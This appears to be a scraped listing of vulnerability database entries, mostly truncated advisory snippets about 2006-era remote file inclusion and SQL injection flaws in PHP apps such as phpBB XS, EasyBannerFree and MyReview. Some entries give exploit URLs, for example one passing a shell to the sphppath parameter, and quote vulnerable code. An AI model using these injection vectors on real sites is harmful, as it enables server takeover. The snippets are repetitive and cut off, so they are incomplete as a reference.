phpECard functions.php远程文件包含漏洞

phpECard脚本允许用户在自己的站点安装电子贺卡系统。 phpECard在处理用户请求时存在输入验证漏洞，远程攻击才可能利用此漏洞在服务器上以Web进程权限执行任意指令。 phpECard没有正确验证functions.php和index.php文件中对includepath参数的输入，允许攻击者通过包含本地或外部资源的任意文件执行任意代码。 phpECard phpECard 2.1.4 phpECard phpECard 2.1.3 我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.quick-xs.net/phpecard/...

PHPClassifieds7.1.txt

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= PHP Classifieds 7.1 - Remote File Include Vulnerability =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Download : http://softadmin.deltascripts.com/downloadget.php?id=32...

PHP Classifieds 7.1 - Remote File Include Vulnerability

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= PHP Classifieds 7.1 - Remote File Include Vulnerability =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Download : http://softadmin.deltascripts.com/downloadget.php?id=32...

P-News <= 1.16 Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================ P-News = 1.16 Remote File Include Vulnerability ================================================ ============================================ P-News 1.16, 1.17 Remote File Inclusion...

CVE-2006-5186

The CVE-2006-5186 entry describes a PHP remote file inclusion in phpMyProfiler

EasyBannerFree.txt

------------------------------- EasyBannerFree functions.php Remote File Include Exploit ------------------------------- find by : abu ahmed ------------------------------- Exploit : http://sitename.com/ path /functions.php?sphppath=shell ------------------------------- thanks for : xp10.com...

BBaCE <= 3.5 (includes/functions.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ======================================================================= BBaCE | | \ \ / / '..' Author: SpiderZ BBaCE Remote File Inclusion Vulnerability For: BBaCE v3 Bulletin Board Ace...

BBaCE &lt;= 3.5 (includes/functions.php) Remote File Include Vulnerability

No description provided by source. / \ \ \ ,, / / '-./.-' .--' '--. / / /""\ \ \ SpiderZ Hacking Security | | | | \ \ / / '..' Author: SpiderZ BBaCE Remote File Inclusion Vulnerability For: BBaCE v3 Bulletin Board Ace Site: www.spiderz.altervista.org Site02: www.spiderz.netsons.org...

EasyBannerFree &#40;functions.php&#41; Remote File Include Exploit

------------------------------- EasyBannerFree functions.php Remote File Include Exploit ------------------------------- find by : abu ahmed ------------------------------- Exploit : http://sitename.com/ path /functions.php?sphppath=shell ------------------------------- thanks for : xp10.com...

CVE-2006-4957

SQL injection vulnerability in the GetMember function in functions.php in MyReview 1.9.4 allows remote attackers to execute arbitrary SQL commands via the email parameter to Admin.php...

CVE-2006-4957

CVE-2006-4957 corresponds to a SQL injection in MyReview 1.9.4. The GetMember function in functions.php fails to sanitize the email parameter used by Admin.php, enabling remote attackers to execute arbitrary SQL. Exploitation details are supported by multiple sources (NVD/Nessus references). The ...

CVE-2006-4957

SQL injection vulnerability in the GetMember function in functions.php in MyReview 1.9.4 allows remote attackers to execute arbitrary SQL commands via the email parameter to Admin.php...

MyReview 1.9.4 - email SQL Injection Code Execution

MyReview 1.9.4 - email SQL Injection Code Execution MyReview 1.9.4 SQL Injection exploit http://myreview.lri.fr/ in functions.php starting from line 382 ............ function GetMember $email, $db, $mode="array" $query = "SELECT FROM PCMember WHERE email = '$email'" ; result = $db-execRequete...

MyReview 1.9.4 - &#039;email&#039; SQL Injection / Code Execution

MyReview 1.9.4 SQL Injection exploit http://myreview.lri.fr/ in functions.php starting from line 382 ............ function GetMember $email, $db, $mode="array" $query = "SELECT FROM PCMember WHERE email = '$email'" ; result = $db-execRequete $query; .......... $email is not checked before used in...

MobilePublisherPHP 1.5 RC2 - Remote File Inclusion

MobilePublisherPHP 1.5 RC2 - Remote File Inclusion MobilePublisherPHP 1.5 RC2 functions.phpRemote Include Vulnerability Discovered by: Timq http://www.securitydb.org Team-Rootshell Email: timqathackernetworkdotcom http://www.securitydb.org Team-Rootshell Vulnerable: require...

CVE-2006-4780

PHP remote file inclusion vulnerability in includes/functions.php in phpBB XS 0.58 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter...

AzzCoder =&gt; phpBB XS 0.58 Remote File Include

A important vulnerability into functions.php will allow a malicious user to insert a remote file. The Vulnerable Code: includeonce $phpbbrootpath . './includes/functionscategorieshierarchy.' . $phpEx ; The phpbbrootpath isn't initialize and PHPBBIN isn't checked...

phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability

Exploit for unknown platform in category web applications ================================================================== phpBB XS = 0.58 functions.php Remote File Include Vulnerability ================================================================== Author: AzzCoder Vendor:...

phpBB XS 0.58 - functions.php Remote File Inclusion

phpBB XS 0.58 - functions.php Remote File Inclusion Author: AzzCoder Vendor: http://www.phpbbxs.eu/ Vulnerable File: includes/functions.php Vulnerable Code: //The phpbbrootpath isn't initialize includeonce $phpbbrootpath . './includes/functionscategorieshierarchy.' . $phpEx ; Method To Use:...

phpBB XS &lt;= 0.58 (functions.php) Remote File Include Vulnerability

No description provided by source. Author: AzzCoder Vendor: http://www.phpbbxs.eu/ Vulnerable File: includes/functions.php Vulnerable Code: //The phpbbrootpath isn't initialize includeonce $phpbbrootpath . './includes/functionscategorieshierarchy.' . $phpEx ; Method To Use:...